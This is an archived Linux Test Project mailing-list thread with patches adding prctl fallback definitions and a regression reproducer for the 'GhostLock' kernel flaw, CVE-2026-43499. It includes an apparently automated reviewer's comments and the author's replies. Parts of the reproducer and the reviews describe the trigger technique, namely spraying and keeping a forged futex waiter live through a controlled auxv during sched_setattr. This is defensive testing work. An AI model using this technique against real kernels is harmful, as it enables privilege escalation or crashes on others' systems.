"sched_setattr() failed"); This maybe worth a SAFE_MACRO() > + tst_atomic_store(1, &stop_spray); > + TST_CHECKPOINT_WAKE(CP_SETATTR_DONE); > + > + SAFE_PTHREAD_JOIN(waiter_th, NULL); > + SAFE_PTHREAD_JOIN(owner_th, NULL); > + } > + > + if (i < ATTEMPTS) > + tst_res(TINFO, "Runtime exhausted, executed %d/%d attempts", i, ATTEMPTS); > + > + tst_res(TPASS, "Kernel survived %d GhostLock trigger attempts", i); > +} > + > +static struct tst_test test = { > + .setup = setup, > + .test_all = run, > + .runtime = 180, > + .needs_checkpoints = 1, > + .needs_kconfigs = (const char *[]) { > + "CONFIG_CHECKPOINT_RESTORE=y", > + "CONFIG_FUTEX_PI=y", > + NULL > + }, > + .taint_check = TST_TAINT_W | TST_TAINT_D, > + .tags = (const struct tst_tag[]) { > + {"linux-git", "3bfdc63936dd"}, > + {"CVE", "2026-43499"}, > + {} > + }, > +}; > > -- > 2.51.0 > > > -- > Mailing list info: https://lists.linux.it/listinfo/ltp -- Cyril Hrubis chrubis@suse.cz -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 10+ messages in thread
* [LTP] [PATCH v3 1/2] lapi/prctl: add more fallback definitions @ 2026-08-03 12:26 Andrea Cervesato 2026-08-03 14:38 ` [LTP] " linuxtestproject.agent 0 siblings, 1 reply; 10+ messages in thread From: Andrea Cervesato @ 2026-08-03 12:26 UTC (permalink / raw) To: Linux Test Project From: Andrea Cervesato <andrea.cervesato@suse.com> Add the following fallback definitions: - PR_SET_MM - PR_SET_MM_MAP - PR_SET_MM_MAP_SIZE - struct prctl_mm_map Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- configure.ac | 2 ++ include/lapi/prctl.h | 25 +++++++++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/configure.ac b/configure.ac index 19fc5e1b8f5f5f94bd797ff2ba4275c29c20cb6c..052b83e048f43b132c59ba393e439a32e2f251d2 100644 --- a/configure.ac +++ b/configure.ac @@ -286,6 +286,8 @@ AC_CHECK_TYPES([struct fsxattr],,,[#include <linux/fs.h>]) AC_CHECK_TYPES([struct logical_block_metadata_cap],,,[#include <linux/fs.h>]) +AC_CHECK_TYPES([struct prctl_mm_map],,,[#include <sys/prctl.h>]) + AC_CHECK_TYPES([struct sockaddr_vm],,,[ #include <sys/socket.h> #include <linux/vm_sockets.h> diff --git a/include/lapi/prctl.h b/include/lapi/prctl.h index 8d3ef5c32ef5e2ee7742cc418b4ec40bee8cd661..278401bb733a823e03b144007d0530335b3f70f7 100644 --- a/include/lapi/prctl.h +++ b/include/lapi/prctl.h @@ -7,6 +7,7 @@ #ifndef LAPI_PRCTL_H__ #define LAPI_PRCTL_H__ +#include <stdint.h> #include <sys/prctl.h> #ifndef PR_SET_NAME @@ -59,4 +60,28 @@ # define PR_SET_SPECULATION_CTRL 53 #endif +#ifndef PR_SET_MM +# define PR_SET_MM 35 +#endif +#ifndef PR_SET_MM_MAP +# define PR_SET_MM_MAP 14 +#endif +#ifndef PR_SET_MM_MAP_SIZE +# define PR_SET_MM_MAP_SIZE 15 +#endif + +#if !(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP) +struct prctl_mm_map { + uint64_t start_code, end_code; + uint64_t start_data, end_data; + uint64_t start_brk, brk; + uint64_t start_stack; + uint64_t arg_start, arg_end; + uint64_t env_start, env_end; + uint64_t *auxv; + uint32_t auxv_size; + uint32_t exe_fd; +}; +#endif + #endif /* LAPI_PRCTL_H__ */ -- 2.51.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 10+ messages in thread
* Re: [LTP] lapi/prctl: add more fallback definitions 2026-08-03 12:26 [LTP] [PATCH v3 1/2] lapi/prctl: add more fallback definitions Andrea Cervesato @ 2026-08-03 14:38 ` linuxtestproject.agent 2026-08-04 7:39 ` Andrea Cervesato via ltp 0 siblings, 1 reply; 10+ messages in thread From: linuxtestproject.agent @ 2026-08-03 14:38 UTC (permalink / raw) To: Andrea Cervesato; +Cc: ltp Hi Andrea, On Mon, 3 Aug 2026, Andrea Cervesato wrote: > lapi/prctl: add more fallback definitions --- [PATCH 1/2] --- > +#ifndef PR_SET_MM_MAP > +# define PR_SET_MM_MAP 14 > +#endif > +#ifndef PR_SET_MM_MAP_SIZE > +# define PR_SET_MM_MAP_SIZE 15 > +#endif > + > +#if !(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP) Could this struct guard depend only on HAVE_STRUCT_PRCTL_MM_MAP? PR_SET_MM_MAP is defined immediately above, so !defined(PR_SET_MM_MAP) is always false here. Systems missing struct prctl_mm_map therefore skip the fallback even when HAVE_STRUCT_PRCTL_MM_MAP is false, and the second patch cannot compile there. --- [PATCH 2/2] --- > + SAFE_PRCTL(PR_SET_MM, PR_SET_MM_MAP_SIZE, (unsigned long)&sz, 0, 0); Could this test set .min_kver = "3.18", or report TCONF when this operation is unavailable? PR_SET_MM_MAP_SIZE was added in Linux 3.18, while CONFIG_CHECKPOINT_RESTORE predates it. A 3.5 through 3.17 kernel with that configuration reaches setup(), rejects this operation, and SAFE_PRCTL() reports TBROK for an unsupported reproducer feature. Verdict - Needs revision --- Note: The agent can sometimes produce false positives although often its findings are genuine. If you find issues with the review, please comment this email or ignore the suggestions. Regards, LTP AI Reviewer -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 10+ messages in thread
* Re: [LTP] lapi/prctl: add more fallback definitions 2026-08-03 14:38 ` [LTP] " linuxtestproject.agent @ 2026-08-04 7:39 ` Andrea Cervesato via ltp 0 siblings, 0 replies; 10+ messages in thread From: Andrea Cervesato via ltp @ 2026-08-04 7:39 UTC (permalink / raw) To: linuxtestproject.agent; +Cc: ltp > > +#if !(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP) > > Could this struct guard depend only on HAVE_STRUCT_PRCTL_MM_MAP? > > PR_SET_MM_MAP is defined immediately above, so !defined(PR_SET_MM_MAP) is > always false here. Systems missing struct prctl_mm_map therefore skip the > fallback even when HAVE_STRUCT_PRCTL_MM_MAP is false, and the second patch > cannot compile there. I'm having issues with this, since it seems struct prctl_mm_map gate it not enough to ensure fallback is not replicating the original one. > > + SAFE_PRCTL(PR_SET_MM, PR_SET_MM_MAP_SIZE, (unsigned long)&sz, 0, 0); > > Could this test set .min_kver = "3.18", or report TCONF when this operation > is unavailable? We don't support this kernel. Agent is going really deep with this, so I guess I need to add a rule to avoid checking for versions below 4.4. -- Andrea Cervesato SUSE QE Automation Engineer Linux andrea.cervesato@suse.com -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 10+ messages in thread
* [LTP] [PATCH v2 1/2] lapi/prctl: add more fallback definitions @ 2026-08-03 8:10 Andrea Cervesato 2026-08-03 9:36 ` [LTP] " linuxtestproject.agent 0 siblings, 1 reply; 10+ messages in thread From: Andrea Cervesato @ 2026-08-03 8:10 UTC (permalink / raw) To: Linux Test Project From: Andrea Cervesato <andrea.cervesato@suse.com> Add the following fallback definitions: - PR_SET_MM - PR_SET_MM_MAP - PR_SET_MM_MAP_SIZE - struct prctl_mm_map Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- configure.ac | 2 ++ include/lapi/prctl.h | 25 +++++++++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/configure.ac b/configure.ac index 19fc5e1b8f5f5f94bd797ff2ba4275c29c20cb6c..052b83e048f43b132c59ba393e439a32e2f251d2 100644 --- a/configure.ac +++ b/configure.ac @@ -286,6 +286,8 @@ AC_CHECK_TYPES([struct fsxattr],,,[#include <linux/fs.h>]) AC_CHECK_TYPES([struct logical_block_metadata_cap],,,[#include <linux/fs.h>]) +AC_CHECK_TYPES([struct prctl_mm_map],,,[#include <sys/prctl.h>]) + AC_CHECK_TYPES([struct sockaddr_vm],,,[ #include <sys/socket.h> #include <linux/vm_sockets.h> diff --git a/include/lapi/prctl.h b/include/lapi/prctl.h index 8d3ef5c32ef5e2ee7742cc418b4ec40bee8cd661..a681aab499271b618d2e61fb79faf0055b6718dd 100644 --- a/include/lapi/prctl.h +++ b/include/lapi/prctl.h @@ -7,6 +7,7 @@ #ifndef LAPI_PRCTL_H__ #define LAPI_PRCTL_H__ +#include <stdint.h> #include <sys/prctl.h> #ifndef PR_SET_NAME @@ -59,4 +60,28 @@ # define PR_SET_SPECULATION_CTRL 53 #endif +#ifndef PR_SET_MM +# define PR_SET_MM 35 +#endif +#ifndef PR_SET_MM_MAP +# define PR_SET_MM_MAP 14 +#endif +#ifndef PR_SET_MM_MAP_SIZE +# define PR_SET_MM_MAP_SIZE 15 +#endif + +#if !defined(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP_SIZE) +struct prctl_mm_map { + uint64_t start_code, end_code; + uint64_t start_data, end_data; + uint64_t start_brk, brk; + uint64_t start_stack; + uint64_t arg_start, arg_end; + uint64_t env_start, env_end; + uint64_t *auxv; + uint32_t auxv_size; + uint32_t exe_fd; +}; +#endif + #endif /* LAPI_PRCTL_H__ */ -- 2.51.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 10+ messages in thread
* Re: [LTP] lapi/prctl: add more fallback definitions 2026-08-03 8:10 [LTP] [PATCH v2 1/2] " Andrea Cervesato @ 2026-08-03 9:36 ` linuxtestproject.agent 0 siblings, 0 replies; 10+ messages in thread From: linuxtestproject.agent @ 2026-08-03 9:36 UTC (permalink / raw) To: Andrea Cervesato; +Cc: ltp Hi Andrea, On Mon, 3 Aug 2026, Andrea Cervesato wrote: > lapi/prctl: add more fallback definitions --- [PATCH 1/2] --- > +#ifndef PR_SET_MM_MAP_SIZE > +# define PR_SET_MM_MAP_SIZE 15 > +#endif > + > +#if !defined(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP_SIZE) Could this declaration be gated only on HAVE_STRUCT_PRCTL_MM_MAP? PR_SET_MM_MAP_SIZE is defined immediately above, so the second condition is always false. On systems where configure finds no struct prctl_mm_map, the fallback is therefore never declared and the test fails to compile. --- [PATCH 2/2] --- > + run_spray(); > + > + TST_CHECKPOINT_WAKE(CP_SPRAYED); > + TST_CHECKPOINT_WAIT(CP_SETATTR_DONE); Could sched_setattr() run while PR_SET_MM_MAP is still copying the controlled auxv? Here all prctl calls return before the checkpoint wake, and the waiter then executes checkpoint futex syscalls before the main thread starts the chain walk. The controlled user_auxv stack array is no longer live and can be overwritten, allowing a vulnerable kernel to survive and be reported as TPASS. The referenced PoC keeps the prctl copy active while sched_setattr() runs so that the forged waiter remains live during the chain walk. Verdict - Needs revision --- Note: The agent can sometimes produce false positives although often its findings are genuine. If you find issues with the review, please comment this email or ignore the suggestions. Regards, LTP AI Reviewer -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 10+ messages in thread
* [LTP] [PATCH 1/2] lapi/prctl: add more fallback definitions @ 2026-08-01 10:34 Andrea Cervesato 2026-08-01 11:27 ` [LTP] " linuxtestproject.agent 0 siblings, 1 reply; 10+ messages in thread From: Andrea Cervesato @ 2026-08-01 10:34 UTC (permalink / raw) To: Linux Test Project From: Andrea Cervesato <andrea.cervesato@suse.com> Add the following fallback definitions: - PR_SET_MM - PR_SET_MM_MAP - PR_SET_MM_MAP_SIZE - struct prctl_mm_map Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- configure.ac | 2 ++ include/lapi/prctl.h | 25 +++++++++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/configure.ac b/configure.ac index 19fc5e1b8f5f5f94bd797ff2ba4275c29c20cb6c..e698c2b890547ccd32872526daeba13477a7edba 100644 --- a/configure.ac +++ b/configure.ac @@ -286,6 +286,8 @@ AC_CHECK_TYPES([struct fsxattr],,,[#include <linux/fs.h>]) AC_CHECK_TYPES([struct logical_block_metadata_cap],,,[#include <linux/fs.h>]) +AC_CHECK_TYPES([struct prctl_mm_map],,,[#include <linux/prctl.h>]) + AC_CHECK_TYPES([struct sockaddr_vm],,,[ #include <sys/socket.h> #include <linux/vm_sockets.h> diff --git a/include/lapi/prctl.h b/include/lapi/prctl.h index 8d3ef5c32ef5e2ee7742cc418b4ec40bee8cd661..96c3396779b3baf01ce05b56d9226fe04cba15c6 100644 --- a/include/lapi/prctl.h +++ b/include/lapi/prctl.h @@ -7,6 +7,7 @@ #ifndef LAPI_PRCTL_H__ #define LAPI_PRCTL_H__ +#include <stdint.h> #include <sys/prctl.h> #ifndef PR_SET_NAME @@ -59,4 +60,28 @@ # define PR_SET_SPECULATION_CTRL 53 #endif +#ifndef PR_SET_MM +# define PR_SET_MM 35 +#endif +#ifndef PR_SET_MM_MAP +# define PR_SET_MM_MAP 14 +#endif +#ifndef PR_SET_MM_MAP_SIZE +# define PR_SET_MM_MAP_SIZE 15 +#endif + +#ifndef HAVE_STRUCT_PRCTL_MM_MAP +struct prctl_mm_map { + uint64_t start_code, end_code; + uint64_t start_data, end_data; + uint64_t start_brk, brk; + uint64_t start_stack; + uint64_t arg_start, arg_end; + uint64_t env_start, env_end; + uint64_t *auxv; + uint32_t auxv_size; + uint32_t exe_fd; +}; +#endif + #endif /* LAPI_PRCTL_H__ */ -- 2.51.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 10+ messages in thread
* Re: [LTP] lapi/prctl: add more fallback definitions 2026-08-01 10:34 [LTP] [PATCH 1/2] " Andrea Cervesato @ 2026-08-01 11:27 ` linuxtestproject.agent 0 siblings, 0 replies; 10+ messages in thread From: linuxtestproject.agent @ 2026-08-01 11:27 UTC (permalink / raw) To: Andrea Cervesato; +Cc: ltp Hi Andrea, On Aug 1, 2026, Andrea Cervesato wrote: > lapi/prctl: add more fallback definitions --- [PATCH 2/2] --- > + static const int try_sizes[] = { > + MAX_AUXV_QWORDS, > + MAX_AUXV_QWORDS - 4, > + MAX_AUXV_QWORDS - 8 > + }; > [...] > + valid_auxv_size = try_sizes[i] * sizeof(uint64_t); Could these sizes either use the native word size, or could the test be restricted to the 64-bit architectures on which the reproducer works? On i386, the smallest attempted size is 320 bytes, but the kernel's saved_auxv is only 56 * sizeof(unsigned long), or 224 bytes. prctl_set_mm_map() therefore rejects all three attempts, and setup reports TBROK. With no supported_archs restriction, the cve runtest entry runs this test on 32-bit x86. Verdict - Needs revision --- Note: The agent can sometimes produce false positives although often its findings are genuine. If you find issues with the review, please comment this email or ignore the suggestions. Regards, LTP AI Reviewer -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 10+ messages in thread
end of thread, other threads:[~2026-09-01 8:37 UTC | newest] Thread overview: 10+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2026-08-26 12:40 [LTP] [PATCH v4 0/2] Reproducer for ghostlock Andrea Cervesato 2026-08-26 12:40 ` [LTP] [PATCH v4 1/2] lapi/prctl: add more fallback definitions Andrea Cervesato 2026-08-27 8:36 ` [LTP] " linuxtestproject.agent 2026-08-27 8:51 ` Andrea Cervesato via ltp 2026-08-26 12:40 ` [LTP] [PATCH v4 2/2] cve: add CVE-2026-43499 reproducer Andrea Cervesato 2026-09-01 8:36 ` Cyril Hrubis -- strict thread matches above, loose matches on Subject: below -- 2026-08-03 12:26 [LTP] [PATCH v3 1/2] lapi/prctl: add more fallback definitions Andrea Cervesato 2026-08-03 14:38 ` [LTP] " linuxtestproject.agent 2026-08-04 7:39 ` Andrea Cervesato via ltp 2026-08-03 8:10 [LTP] [PATCH v2 1/2] " Andrea Cervesato 2026-08-03 9:36 ` [LTP] " linuxtestproject.agent 2026-08-01 10:34 [LTP] [PATCH 1/2] " Andrea Cervesato 2026-08-01 11:27 ` [LTP] " linuxtestproject.agent
This is an external index of several public inboxes, see mirroring instructions on how to clone and mirror all data and code used by this external index.